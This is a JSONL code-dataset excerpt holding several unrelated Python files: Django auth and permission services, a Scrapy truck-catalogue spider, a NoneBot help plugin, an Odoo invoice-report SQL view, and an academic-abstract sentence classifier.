pagination,\n }\n\n def ProcessFormData(self, mr, post_data):\n \"\"\"Process the posted form.\"\"\"\n _, owner_ids_dict = self.services.usergroup.LookupMembers(\n mr.cnxn, [mr.viewed_user_auth.user_id])\n owner_ids = owner_ids_dict[mr.viewed_user_auth.user_id]\n permit_edit = permissions.CanEditGroup(\n mr.perms, mr.auth.effective_ids, owner_ids)\n if not permit_edit:\n raise permissions.PermissionException(\n 'User is not permitted to edit group membership')\n\n group_settings = self.services.usergroup.GetGroupSettings(\n mr.cnxn, mr.viewed_user_auth.user_id)\n if bool(group_settings.ext_group_type):\n raise permissions.PermissionException(\n 'Imported groups are read-only')\n\n if 'addbtn' in post_data:\n return self.ProcessAddMembers(mr, post_data)\n elif 'removebtn' in post_data:\n return self.ProcessRemoveMembers(mr, post_data)\n\n def ProcessAddMembers(self, mr, post_data):\n \"\"\"Process the user's request to add members.\n\n Args:\n mr: common information parsed from the HTTP request.\n post_data: dictionary of form data.\n\n Returns:\n String URL to redirect the user to after processing.\n \"\"\"\n # 1. Gather data from the request.\n group_id = mr.viewed_user_auth.user_id\n add_members_str = post_data.get('addmembers')\n new_member_ids = project_helpers.ParseUsernames(\n mr.cnxn, self.services.user, add_members_str)\n role = post_data['role']\n\n # 2. Call services layer to save changes.\n if not mr.errors.AnyErrors():\n try:\n self.services.usergroup.UpdateMembers(\n mr.cnxn, group_id, new_member_ids, role)\n except exceptions.CircularGroupException:\n mr.errors.addmembers = (\n 'The members are already ancestors of current group.')\n\n # 3. Determine the next page in the UI flow.\n if mr.errors.AnyErrors():\n self.PleaseCorrect(\n mr, initial_add_members=add_members_str,\n initially_expand_form=ezt.boolean(True))\n else:\n return framework_helpers.FormatAbsoluteURL(\n mr, '/g/%s/' % mr.viewed_username, include_project=False,\n saved=1, ts=int(time.time()))\n\n def ProcessRemoveMembers(self, mr, post_data):\n \"\"\"Process the user's request to remove members.\n\n Args:\n mr: common information parsed from the HTTP request.\n post_data: dictionary of form data.\n\n Returns:\n String URL to redirect the user to after processing.\n \"\"\"\n # 1. Gather data from the request.\n remove_strs = post_data.getall('remove')\n logging.info('remove_strs = %r', remove_strs)\n\n if not remove_strs:\n mr.errors.remove = 'No users specified'\n\n # 2. Call services layer to save changes.\n if not mr.errors.AnyErrors():\n remove_ids = set(\n self.services.user.LookupUserIDs(mr.cnxn, remove_strs).values())\n self.services.usergroup.RemoveMembers(\n mr.cnxn, mr.viewed_user_auth.user_id, remove_ids)\n\n # 3. Determine the next page in the UI flow.\n if mr.errors.AnyErrors():\n self.PleaseCorrect(mr)\n else:\n return framework_helpers.FormatAbsoluteURL(\n mr, '/g/%s/' % mr.viewed_username, include_project=False,\n saved=1, ts=int(time.time()))\n","sub_path":"appengine/monorail/sitewide/groupdetail.py","file_name":"groupdetail.py","file_ext":"py","file_size_in_byte":7811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"556309564","text":"\r\nimport json\r\nfrom app import ErrorRun_impl, TypeError_system\r\nfrom app.com_data.any_mixin import getUser, Res_proc\r\n# from .serv_advuser import servAdvUser_get_advUser\r\n\r\n\r\nclass Com_proc_sprstatus:\r\n \"\"\" class содержащий сервис обработки атрибутов модели SprStatus \"\"\"\r\n\r\n\r\n\r\n\r\n _s_err = 'SyntaxError##advuser.serv_sprstatus.Com_proc_sprstatus'\r\n _s_err_user_notData = 'Пользователь User не определен'\r\n\r\n #процедура вызова ErrorRun_impl\r\n @classmethod\r\n def _run_raise(cls, s_arg, showMes=None, s_err=None):\r\n\r\n s_err = s_err or cls._s_err\r\n\r\n if showMes:\r\n raise ErrorRun_impl('verify##{0}'.format(s_arg))\r\n else:\r\n s_mes = '{0} {1}'.format(s_err, s_arg)\r\n TypeError_system(ErrorRun_impl(s_mes)) # запись в файл app/loggin/*.log\r\n raise ErrorRun_impl(s_mes)\r\n\r\n\r\n @classmethod\r\n def get_list_levelperm(cls)->Res_proc:\r\n \"\"\" Выборка значений status_id, levelperm по ВСЕМУ справочнику SprStatus\r\n return Res_proc.res_list = list( dict(lvperm=Number, status=str), ... )\r\n \"\"\"\r\n from .models import SprStatus\r\n\r\n res_proc = Res_proc()\r\n lst = []\r\n\r\n try:\r\n\r\n rows = SprStatus.objects.filter(levelperm__gte=10)\r\n if rows.exists():\r\n for row in rows:\r\n lst.append( dict(lvperm=row.levelperm, status=row.status) )\r\n\r\n res_proc.res_list = lst\r\n res_proc.res = True\r\n\r\n except Exception as ex:\r\n res_proc.error = ex\r\n\r\n return res_proc\r\n\r\n\r\n @classmethod\r\n def get_levelperm(cls, arg_statusID:str)->int:\r\n \"\"\" По значению arg_statusID выборка levelperm\r\n return val_levelperm or 0\r\n \"\"\"\r\n from .models import SprStatus\r\n\r\n res = 0\r\n\r\n try:\r\n\r\n row = SprStatus.objects.get(pk=arg_statusID)\r\n res = row.levelperm\r\n\r\n return res\r\n\r\n except:\r\n return 0\r\n\r\n\r\n\r\n # Процедура доступа к объекту cls.SprStatus\r\n \"\"\"\r\n testing: 19.05.2020\r\n modul: prtesting.tests.advuser.serv_sprstatus\r\n file: tests/advuser/serv_sprstatus/test_sprstatus_serv.json\r\n -----------------------------------------------\r\n возвращает объект cls.SprStatus or None\r\n -----------------------------------------------\r\n username -> извлекается из kwages[username]\r\n ВСЕ параметры игнорируются\r\n извлекается row SprStatus for User\r\n ---------------------------------\r\n agr_status -> User, AdvUser, str==statusID\r\n \"\"\"\r\n @classmethod\r\n def getStatus_or_None(cls, arg_status=None, **kwargs):\r\n \"\"\"return obj_sprStatus_or_None\r\n username -> извлекается из kwages {username:data_username}\r\n ВСЕ параметры игнорируются\r\n извлекается row SprStatus for User\r\n ---------------------------------\r\n agr_status -> User, AdvUser, str==statusID \"\"\"\r\n\r\n def _get_status_or_None(arg_user):\r\n try:\r\n _user = getUser(arg_user)\r\n if _user is None:\r\n cls._run_raise(cls._s_err_user_notData)\r\n\r\n if _user.is_superuser:\r\n return cls._get_filter_obj('superuser')\r\n\r\n _advUser = _user.advuser\r\n\r\n return _advUser.status\r\n\r\n except Exception as ex :\r\n return None\r\n\r\n\r\n username = kwargs.get('username')\r\n statusID = kwargs.get('statusID')\r\n arg_status= arg_status or kwargs.get('arg_status')\r\n #-------------------------------------------------------\r\n\r\n if username: # Поиск по логину\r\n return _get_status_or_None(username)\r\n\r\n else:\r\n s_type = type(arg_status).__name__\r\n\r\n if s_type == 'User':\r\n return _get_status_or_None(arg_status)\r\n\r\n elif s_type == 'AdvUser':\r\n return arg_status.status\r\n\r\n else:\r\n\r\n if arg_status is None or s_type == 'str':\r\n s_param = arg_status or statusID\r\n if s_param :\r\n return cls._get_filter_obj(s_param)\r\n else:\r\n return None\r\n\r\n\r\n @classmethod\r\n def _get_filter_obj(cls, statusID):\r\n \"\"\" return obj_or_None Основная процедура доступа к атрибутам модели sprStatus \"\"\"\r\n\r\n from .models import SprStatus\r\n\r\n try:\r\n res = None\r\n\r\n if not isinstance(statusID, str):\r\n cls._run_raise('_get_filter_obj: Аргумент statusID не соответствие типа')\r\n\r\n filter = SprStatus.objects.filter(pk=statusID)\r\n if filter.exists():\r\n res = filter.first()\r\n\r\n else:\r\n cls._run_raise('_get_filter_obj: статус не определен: '+ statusID)\r\n\r\n return res\r\n\r\n except Exception as ex:\r\n return None\r\n\r\n\r\n \"\"\"Тестирование 19.05.2020.\r\n\r\n modul: prtests.tests.advuser.serv_sprstatus.test_serv_sprtatus\r\n file : tests/advuser/serv_sprstatus/test_sprstatus_serv.json\r\n ----------------------------------------------------------------------\r\n\r\n Возвращает res.res_obj == class PermModf_prof(...) в котором определены\r\n ВСЕ атрибуты привелегий\r\n ------------------------------------------------------\r\n Права на обработку профиля, указанный в arg_modf\r\n arg_modf -> строка формата: add_STATUS or upd_STATUS\r\n STATUS -> proj-memb, subheader и другие значени из SprStatus.pk\r\n из arg_modf извлекаются первые 3 символа -> идентификатор метода обработки\r\n\r\n arg_model -> str, int, User, AdvUser\r\n преобразование в STATUS\r\n из STATUS.any_option -> извлекаются ВСЕ необходимые данные\r\n --------------------------------------------------------------\r\n Возвращается объект res.res_obj = permMod_prof(arg_status)\r\n \"\"\"\r\n @classmethod\r\n def get_permModf_prof(cls, arg_model, arg_modf):\r\n \"\"\" return class PermModf_prof(...) в котором определены ВСЕ атрибуты ПРИВЕЛЕГИЙ\r\n class PermModf_prof создан внутри вызываемой процедуры \"\"\"\r\n\r\n from .serv_advuser import servAdvUser_get_advUser\r\n\r\n class _PermModf_prof:\r\n \"\"\"Вспомогательный класс.\r\n\r\n Формат входящего аргумента arg_dict:\r\n структура dict из sprStatus.any_option\r\n\r\n {exist=\"exist or empty\", mes=\"КраткИнформ\", prof={add_prof:[lst_STATUS], upd_prof:[lst_STATUS] },\r\n err_add=\"Сообщение при отсутствии прав на создПроф\",\r\n err_upd=\"Сообщение при отсутствии на измПроф\" }\r\n \"\"\"\r\n\r\n def __init__(self, arg_status):\r\n self.err_add = None\r\n self.err_upd = None\r\n self.mes = None\r\n\r\n self.perm_addProf = False\r\n self.perm_updProf = False\r\n self.status_modf = None\r\n\r\n #---------- инициализация уровня привилегий пользователя ------------\r\n # ------\r\n self.levelperm = arg_status.levelperm\r\n self.statusID = arg_status.pk\r\n\r\n self._init_perm() # процедурная инициализаци\r\n\r\n # верификация вхождения self.statusID в списки\r\n # допустимых привилегий add_prof and upd_prof\r\n def _init_perm(self):\r\n _statusID = arg_modf[4:]\r\n self.status_modf = _statusID\r\n\r\n status = cls.getStatus_or_None(_statusID)\r\n\r\n # считывание дополнительных параметров из sprStatus.any_option, определяющие\r\n # привилегии изм/созд профиля\r\n # там считываются значения для отображения сообщений отсутствия при��илегий\r\n if status:\r\n any_option = json.loads(status.any_option)\r\n _exist = Res_proc.FN_exist()\r\n\r\n self.mes = any_option['mes']\r\n self.err_add = any_option.get('err_add') or self.mes\r\n self.err_upd = any_option.get('err_upd') or self.mes\r\n\r\n if any_option[_exist] == _exist:\r\n prof = any_option['prof']\r\n if prof:\r\n add_perm = prof.get('add_prof')\r\n upd_perm = prof.get('upd_prof')\r\n if self.statusID in add_perm:\r\n self.perm_addProf = True\r\n if self.statusID in upd_perm:\r\n self.perm_updProf = True\r\n\r\n else:\r\n cls._run_raise(' get_permMod_prof.class PermModf_prof._init_perm status:{0} не определен'.format(_statusID))\r\n\r\n @property\r\n def PR_permAdd(self): return self.perm_addProf\r\n\r\n @property\r\n def PR_permUpd(self): return self.perm_updProf\r\n\r\n def __str__(self):\r\n\r\n s_res = ''\r\n _empty = Res_proc.FN_empty()\r\n\r\n s_err_add = ''\r\n s_err_upd = ''\r\n\r\n if not self.PR_permAdd:\r\n s_err_add = 'err_add:{0}'.format(self.err_add)\r\n if not self.PR_permUpd:\r\n s_err_upd = 'err_upd:{0}'.format(self.err_upd)\r\n\r\n s_res = '{0}: level:{1} modfProf:{2} permAdd:{3} permUpd:{4} {5} {6}'.format(\r\n self.statusID,\r\n self.levelperm,\r\n self.status_modf,\r\n self.PR_permAdd or _empty,\r\n self.PR_permUpd or _empty,\r\n s_err_add,\r\n s_err_upd\r\n )\r\n return s_res\r\n\r\n # ****************** PermModf_prof ********************\r\n\r\n\r\n res = Res_proc()\r\n _status = None\r\n\r\n s_type = type(arg_model).__name__\r\n\r\n try:\r\n\r\n if arg_modf[:3] not in ('add','upd'):\r\n res.error = ('ValueError##cls.SprStatus.get_permMod_prof arg_prof: не соответствие стурктуре формата add_* or upd_*')\r\n return res\r\n\r\n\r\n if s_type == 'AdvUser':\r\n _advuser = arg_model\r\n _status = _advuser.status\r\n\r\n else:\r\n if s_type in ('User','str','int' ):\r\n\r\n # если это суперПользователь разрешить изменение, добавление любого профиля\r\n user = getUser(arg_model)\r\n if user:\r\n if user.is_superuser:\r\n _status = cls.getStatus_or_None(user)\r\n if _status is None:\r\n cls._run_raise(' get_permModf_prof: статус суперПользователя не определен')\r\n\r\n permModf = _PermModf_prof( _status )\r\n\r\n res.res = True\r\n res.res_obj = permModf\r\n return res\r\n\r\n else:\r\n res_advUser = servAdvUser_get_advUser(user)\r\n if res_advUser is None:\r\n res.error = ErrorRun_impl('ValueError##cls.SprStatus.get_permMod_prof: нет данных в модели AdvUser')\r\n return res\r\n\r\n _advuser = res_advUser.res_model\r\n _status = _advuser.status\r\n\r\n # ----------------- конец блока верификации и инциализации ------------------\r\n\r\n\r\n\r\n permModf = _PermModf_prof(_status)\r\n\r\n res.res = True\r\n res.res_obj = permModf\r\n\r\n except Exception as ex:\r\n res.error = ex\r\n\r\n return res\r\n# ----------- Конец get_permMod_prof -------------------\r\n\r\n # return statusID or None\r\n \"\"\"\r\n testing 20.05.2020\r\n modul: prtesting.tests.advuser.serv_sprstatus.test_serv_sprstatus\r\n procedure: test_simpl_proc\r\n file: tests.advuser.serv_sprstatus.test_sprstatus_serv.json\r\n \"\"\"\r\n @classmethod\r\n def get_statusID_user(cls, user):\r\n \"\"\" возврString statusId or None\r\n входАргумент user преобразуется/проверяется через getUser(user)\r\n --------------------------------------------------\r\n return statusID_or_None for User \"\"\"\r\n\r\n user = getUser(user)\r\n\r\n if user is None: return None\r\n\r\n _status = cls.getStatus_or_None(user)\r\n if _status is None:\r\n return None\r\n\r\n return _status.pk\r\n\r\n\r\n\r\n #**************** Вспомогательный сервис ****************\r\n\r\n \"\"\"\r\n testing 20.05.2020\r\n modul: prtesting.tests.advuser.serv_sprstatus.test_serv_sprstatus\r\n procedure: test_simpl_proc\r\n file: tests.advuser.serv_sprstatus.test_sprstatus_serv.json\r\n\r\n Выполнено тестирование перечисленных процедур\r\n get_status_qust_simp, get_status_qust_regs\r\n get_status_header, get_status_pradm, get_status_suadm, get_status_notstatus\r\n \"\"\"\r\n @classmethod\r\n def get_status_qust_simp(cls):\r\n \"\"\" return obj_or_None Объект sprStatus for qust-simp гостевой вход \"\"\"\r\n\r\n return cls.getStatus_or_None('qust-simp')\r\n\r\n\r\n @classmethod\r\n def get_status_by_levelperm(cls, arg_levelperm:int):\r\n \"\"\" Выборка объекта Status по значению levelperm\r\n return SprStatus or None\r\n \"\"\"\r\n\r\n from .models import SprStatus\r\n\r\n row = SprStatus.objects.filter(levelperm=arg_levelperm)\r\n if row.exists():\r\n row = row.first()\r\n else:\r\n return None\r\n\r\n return row\r\n\r\n\r\n @classmethod\r\n def get_status_qust_regs(cls):\r\n \"\"\" return obj_or_None Объект sprStatus for qust_regs зарегистрированный клиент \"\"\"\r\n\r\n res = cls.getStatus_or_None('qust-regs')\r\n\r\n return res\r\n\r\n\r\n # объект sprStatus_or_None for руководПроекта\r\n @classmethod\r\n def get_status_header(cls):\r\n \"\"\" return sprStatus_or_None объект sprStatus for proj-head руководитель проекта \"\"\"\r\n\r\n res = cls._get_filter_obj('proj-head')\r\n if not res:\r\n cls._run_raise('Нет данных для руководителя проекта')\r\n\r\n return res\r\n\r\n\r\n # объект sprStatus_or_Exception for руководПроекта\r\n @classmethod\r\n def get_status_pradm(cls):\r\n \"\"\" return obj sprStatus_or_Exception Администратор проекта\"\"\"\r\n\r\n res = cls.getStatus_or_None('proj-sadm')\r\n if not res:\r\n cls._run_raise('Нет данных для администратора проекта')\r\n\r\n return res\r\n\r\n # объект sprStatus_or_Exception for суперПользователя\r\n @classmethod\r\n def get_status_suadm(cls):\r\n \"\"\" return obj sprStatus_or_Exception суперПользователь \"\"\"\r\n\r\n res = cls._get_filter_obj('superuser')\r\n if not res:\r\n cls._run_raise('Нет данных для суперпользователя проекта')\r\n\r\n return res\r\n\r\n @classmethod\r\n def get_status_notstatus(cls):\r\n res = cls._get_filter_obj('notstatus')\r\n if not res:\r\n cls._run_raise('Нет данных для notstatus')\r\n\r\n return res\r\n\r\n\r\n\r\n\r\n\r\ndef serv_SprStatus(arg_proc, arg_param=None, **kwargs):\r\n \"\"\" Процедура-диспетчер обработки сервиса\r\n arg_proc стрИдентиф процедуры из Com_proc_sprstatus\r\n arg_dict_param dict параметров:\r\n key - идентифПараметра\r\n val - значениеПараметра \"\"\"\r\n\r\n if not hasattr(Com_proc_sprstatus, arg_proc):\r\n raise ErrorRun_impl('NotData##advuser.serv_sprstatus.serv_SprStatus arg_param не найдена процедура в Com_proc_sprstatus')\r\n\r\n proc = getattr(Com_proc_sprstatus, arg_proc)\r\n\r\n return proc(arg_param, **kwargs)\r\n\r\n\r\n# ------------------- Ссылочный интерфейс процедур обработки данных SprStatus ------------------\r\n\r\ngetStatus_or_None = Com_proc_sprstatus.getStatus_or_None\r\nget_permModf_prof = Com_proc_sprstatus.get_permModf_prof #\r\n","sub_path":"advuser/serv_sprstatus.py","file_name":"serv_sprstatus.py","file_ext":"py","file_size_in_byte":17964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"334990689","text":"# coding=utf-8\nfrom scrapy import Request\nfrom scrapy import Spider\n\nfrom car_scrapy.items import CarScrapyItem\n\n\nclass KacheSpider(Spider):\n name = \"360che\"\n start_urls = [\n 'http://product.360che.com/'\n ]\n\n def parse(self, response):\n resList1 = response.xpath(u'//h2/a/@href').extract()\n if len(resList1) > 0:\n for i in resList1:\n yield Request('http://product.360che.com'+i, callback=self.parse1)\n resList1 = response.xpath(u'//div[@class=\"article-page\"]/a[last()]/@href').extract()\n if len(resList1) > 0:\n yield Request('http://product.360che.com'+resList1[0], callback=self.parse)\n\n def parse1(self,response):\n item = CarScrapyItem()\n item['url'] = response.url.replace(\"http://product.\", \"http://product.m.\")\n x_path = u'/html/body/div[6]/div[1]/div[2]/div/a[3]/text()'\n resList1 = response.xpath(x_path).extract()\n item['brand'] = resList1[0]\n x_path = u'/html/body/div[6]/div[1]/div[2]/div/a[4]/text()'\n resList1 = response.xpath(x_path).extract()\n item['name'] = resList1[0]\n x_path = u'/html/body/div[6]/div[1]/div[2]/div/a[5]/text()'\n resList1 = response.xpath(x_path).extract()\n item['type'] = resList1[0]\n yield item\n","sub_path":"scrapydeme/car_test/car_scrapy/spiders/360che_spider.py","file_name":"360che_spider.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"157993987","text":"from nonebot import on_command\nfrom nonebot.plugin.export import export\nfrom nonebot.plugin import get_loaded_plugins\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.cqhttp.bot import Bot\nfrom nonebot.adapters.cqhttp.event import MessageEvent\nfrom nonebot.adapters.cqhttp.permission import GROUP, PRIVATE_FRIEND\nfrom omega_miya.utils.omega_plugin_utils import init_export, init_processor_state, PluginCoolDown\n\n\n# Custom plugin usage text\n__plugin_custom_name__ = '帮助'\n__plugin_usage__ = r'''【帮助】\n一个简单的帮助插件\n\n**Permission**\nFriend Private\nCommand & Lv.10\nor AuthNode\n\n**AuthNode**\nbasic\n\n**Usage**\n/帮助 [插件名]'''\n\n\n# Init plugin export\ninit_export(export(), __plugin_custom_name__, __plugin_usage__)\n\n\n# 注册事件响应器\nbot_help = on_command(\n 'help',\n aliases={'Help', '帮助'},\n # 使用run_preprocessor拦截权限管理, 在default_state初始化所需权限\n state=init_processor_state(\n name='help',\n command=True,\n level=10,\n cool_down=[\n PluginCoolDown(PluginCoolDown.user_type, 300),\n PluginCoolDown(PluginCoolDown.group_type, 60)\n ]),\n permission=GROUP | PRIVATE_FRIEND,\n priority=10,\n block=True)\n\n\n@bot_help.handle()\nasync def handle_first_receive(bot: Bot, event: MessageEvent, state: T_State):\n # 获取设置了名称的插件列表\n plugins = list(filter(lambda p: set(p.export.keys()).issuperset({'custom_name', 'usage'}), get_loaded_plugins()))\n if not plugins:\n await bot_help.finish('暂时没有可用的插件QAQ')\n state['plugin_list'] = plugins\n # 首次发送命令时跟随的参数,例:/天气 上海,则args为上海\n args = str(event.get_plaintext()).strip().lower().split()\n if args:\n # 如果用户发送了参数则直接赋值\n state['plugin_name'] = args[0]\n else:\n # 如果用户没有发送参数, 则发送功能列表并结束此命令\n plugins_list = '\\n'.join(p.export.custom_name for p in plugins)\n await bot_help.finish(f'我现在支持的插件有: \\n\\n{plugins_list}\\n\\n'\n f'注意: 群组权限等级未达到要求的, 或非好友或未启用私聊功能的命令不会被响应\\n\\n'\n f'输入\"/help [插件]\"即可查看插件详情及帮助')\n\n\n@bot_help.got('plugin_name', prompt='你想查询哪个插件的用法呢?')\nasync def handle_plugin_name(bot: Bot, event: MessageEvent, state: T_State):\n plugin_custom_name = state[\"plugin_name\"]\n # 如果发了参数则发送相应命令的使用帮助\n for p in state['plugin_list']:\n if p.export.custom_name.lower() == plugin_custom_name:\n await bot_help.finish(p.export.usage)\n await bot_help.finish('没有这个插件呢QAQ, 请检查输入插件名是否正确~')\n","sub_path":"omega_miya/plugins/omega_help/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585691551","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import render, redirect\nfrom django.core.urlresolvers import reverse\n\nfrom django.http import HttpResponseRedirect, HttpResponseBadRequest, Http404\nfrom .forms import LoginForm, UserCreationForm\nfrom .models import ExtUser\nfrom django.core.mail import send_mail\nfrom django.views import generic\n\n\ndef login_view(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/')\n form = LoginForm\n if request.POST:\n form = LoginForm(request.POST)\n if form.is_valid():\n user = authenticate(username=form.cleaned_data['email'], password=form.cleaned_data['password'])\n if user is None:\n form.add_error('password', 'The username and password were incorrect')\n else:\n if user.is_active:\n login(request, user)\n messages.success(request, '{}, добро пожаловать!'.format(user.get_full_name()))\n return HttpResponseRedirect(request.GET.get('next') or '/')\n else:\n form.add_error('email', 'Account is inactive')\n return render(request, 'login.html', {'form': form})\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/')\n\n\ndef signup_view(request):\n if request.user.is_authenticated():\n return redirect('/')\n form = UserCreationForm\n if request.POST:\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n activate_link = request.build_absolute_uri(reverse('confirm_email', kwargs={\n 'email': user.email,\n 'confirm_key': str(user.confirm_key)\n }))\n send_mail('ZROCK - Регистрация',\n 'Для активации аккаунта перейдите по ссылке: {}'.format(activate_link),\n 'no-reply@zrock.ru',\n [user.email],\n fail_silently=False,\n html_message='Для активации аккаунта перейдите по ссылке
{0}'.format(\n activate_link)\n )\n request.session['email'] = user.email\n return redirect(reverse('signup_success'))\n return render(request, 'signup.html', {'form': form})\n\n\ndef signup_success_view(request):\n email = request.session.get('email')\n if request.user.is_authenticated() or not email:\n return redirect('/')\n return render(request, 'signup-success.html', {'email': email})\n\n\ndef confirm_email_view(request, email, confirm_key):\n if request.user.is_authenticated():\n return redirect('/')\n if not email or not confirm_key:\n raise HttpResponseBadRequest()\n try:\n user = ExtUser.objects.get(email=email)\n except user.DoesNotExist:\n raise HttpResponseBadRequest()\n\n if user.confirm_key != confirm_key:\n raise HttpResponseBadRequest()\n if not user.is_active:\n user.is_active = True\n user.save()\n return render(request, 'confirm-email-success.html', {'email': email})\n\n\n\nclass ProfileView(generic.DetailView):\n model = ExtUser\n\n\nclass UsersView(generic.ListView):\n model = ExtUser\n template_name = 'user_list.html'\n\n def get_queryset(self):\n query_set = super().get_queryset()\n query_set = query_set.filter(is_active=True)\n return query_set\n","sub_path":"extuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"439122412","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import tools\nfrom odoo import models, fields, api, _\nimport odoo.addons.decimal_precision as dp\nfrom odoo.osv import osv\n\nclass account_invoice_report(models.Model):\n _inherit = \"account.invoice.report\"\n \n currency_rate = fields.Float('Currency Rate', readonly=True, group_operator = 'avg')\n currency_rate2 = fields.Float('1/Rate', readonly=True, digits_compute=(12,4), group_operator = 'avg')\n price_subtotal_inv_curr = fields.Float('Base Foreign Currency', readonly=True)\n invoice_number = fields.Char('Invoice Number', readonly=True)\n residual2 = fields.Float('Residual Foreign Currency', readonly=True)\n \n \n\n _depends = {\n 'account.invoice': [\n 'number', 'reference',\n ],\n 'res.currency.rate': ['rate2'], \n }\n\n \n def init(self):\n # self._table = account_invoice_report\n cr = self.env.cr\n tools.drop_view_if_exists(cr,self._table)\n cr.execute(\"\"\"CREATE or REPLACE VIEW %s as (\n WITH currency_rate (currency_id, rate, rate2, date_start, date_end) AS (\n SELECT r.currency_id, r.rate, r.rate2, left(r.name::text,10)::date AS date_start,\n (SELECT left(name::text,10)::date FROM res_currency_rate r2\n WHERE left(r2.name::text, 10) > left(r.name::text, 10) AND\n r2.currency_id = r.currency_id\n ORDER BY r2.name ASC\n LIMIT 1) AS date_end\n FROM res_currency_rate r\n )\n %s\n FROM (\n %s %s %s\n ) AS sub\n JOIN currency_rate cr ON\n (cr.currency_id = sub.currency_id AND\n cr.date_start <= COALESCE(sub.date, NOW()) AND\n (cr.date_end IS NULL OR cr.date_end > COALESCE(sub.date, NOW())))\n )\"\"\" % (\n self._table,\n self._select(), self._sub_select(), self._from(), self._group_by()))\n\n def _select(self):\n return super(account_invoice_report, self)._select() + \", cr.rate2/sub.nbr as currency_rate2, sub.invoice_number, sub.price_total price_subtotal_inv_curr, sub.residual residual2\"\n\n def _sub_select(self):\n return super(account_invoice_report, self)._sub_select() + \", case when ai.reference is not null THEN ai.reference ELSE ai.number END invoice_number\"\n\n def _group_by(self):\n return super(account_invoice_report, self)._group_by() + \", ai.number, ai.reference, ail.price_subtotal\"\n ","sub_path":"extrasGDL/facturacion/argil_invoice_analysis_extension/account_invoice_report.py","file_name":"account_invoice_report.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"290059315","text":"import numpy as np\n\nfrom src.pdf_processing.rule_based.AbstractExtractor import extractAbstract, extractAbstractUsingFile\nfrom src.pdf_processing.utils.SentenceTokenizer import SENTENCE_SPLITTER\nfrom src.pdf_processing.utils.WordTokenizer import removeCommonWordsAndTokenize\nfrom src.pdf_processing.vector_based.Label import Label\nfrom src.pdf_processing.vector_based.models.Doc2VecModel import Doc2vecModel\nfrom src.pdf_processing.vector_based.models.FastTextModel import FastTextModel\n\n# model = Doc2vecModel(\"21\")\nmodel = FastTextModel(\"1\")\n\n\ndef processAcademicWork(filePath):\n abstract = extractAbstract(filePath)\n return extractDataFromAbstract(abstract)\n\n\ndef processAcademicWorkFile(file):\n abstract = extractAbstractUsingFile(file)\n return extractDataFromAbstract(abstract)\n\n\ndef extractDataFromAbstract(abstract):\n abstractSentences = SENTENCE_SPLITTER.tokenize(abstract)\n matrix = populatePredictionMatrix(abstractSentences)\n purpoiseSentenceIndex = findPurposeSentenceIndex(matrix)\n rowMaximum = findMaxAcceptableValueInRow(matrix)\n\n result = dict()\n if purpoiseSentenceIndex is None:\n purposeSentence = \"\"\n else:\n purposeSentence = abstractSentences[purpoiseSentenceIndex]\n result.update({Label.PURPOSE.value: purposeSentence})\n\n labels = [e.value for e in Label]\n labels.remove(Label.PURPOSE.value)\n labels.remove(Label.OTHER.value)\n\n for label in labels:\n tasksSentenceIndices = findSentenceIndeces(rowMaximum, label)\n tasks = list()\n for taskSentenceId in tasksSentenceIndices:\n tasks.append(abstractSentences[taskSentenceId])\n record = {label: tasks}\n result.update(record)\n return result\n\n\ndef findSentenceIndeces(rowMaximum, label):\n labels = model.logreg.classes_\n tasksLocation = np.where(labels == label)\n tasksSentenceIndices = np.where(rowMaximum == tasksLocation[0])[0]\n return tasksSentenceIndices\n\n\ndef findPurposeSentenceIndex(matrix):\n labels = model.logreg.classes_\n purposeLocation = np.where(labels == Label.PURPOSE.value)\n\n rowMaximum = findMaxAcceptableValueInRow(matrix)\n if purposeLocation not in rowMaximum:\n return None\n\n columnMaximum = np.argmax(matrix, axis=0)\n purpoiseSentenceIndex = columnMaximum[purposeLocation]\n\n matrix[purpoiseSentenceIndex, :] = 0\n matrix[:, purposeLocation] = 0\n matrix[purpoiseSentenceIndex, purposeLocation] = 1\n return purpoiseSentenceIndex[0]\n\n\ndef findMaxAcceptableValueInRow(matrix):\n maxValuePositionInRow = np.argmax(matrix, axis=1)\n maxValueInRow = np.amax(matrix, axis=1)\n\n acceptableValuePositioninRow = maxValuePositionInRow.copy()\n maskIndices = np.where(maxValueInRow <= 0.5)[0]\n\n acceptableValuePositioninRow[maskIndices] = -1\n return acceptableValuePositioninRow\n\n\ndef populatePredictionMatrix(abstractSentences):\n data = list()\n for idx, sentence in enumerate(abstractSentences):\n sentenceWords = removeCommonWordsAndTokenize(sentence)\n print(sentenceWords)\n if len(sentenceWords) == 1 and sentenceWords[0] == \"SKAITLIS\":\n data.append(np.zeros(len(model.logreg.classes_)))\n continue\n try:\n testSentenceVector = model.calculateSentenceVector(sentenceWords)\n except ValueError:\n data.append(np.zeros(len(model.logreg.classes_)))\n continue\n proba = model.logreg.predict_proba([testSentenceVector])\n data.append(proba[0])\n matrix = np.array(data)\n return matrix\n","sub_path":"src/ui/AcademicWorkProcessor.py","file_name":"AcademicWorkProcessor.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"519313813","text":"\nfrom cordex import conventions as conv\n\n# create your own filename convention string and list\nfilename_conv_str = 'my_convention_{variable}_{model_id}_{domain_id}.nc'\npath_conv_list = ['model_id','variable']\n\n# create conventions for filename and path\nfilename_conv = conv.FileNameConvention(filename_conv_str)\npath_conv = 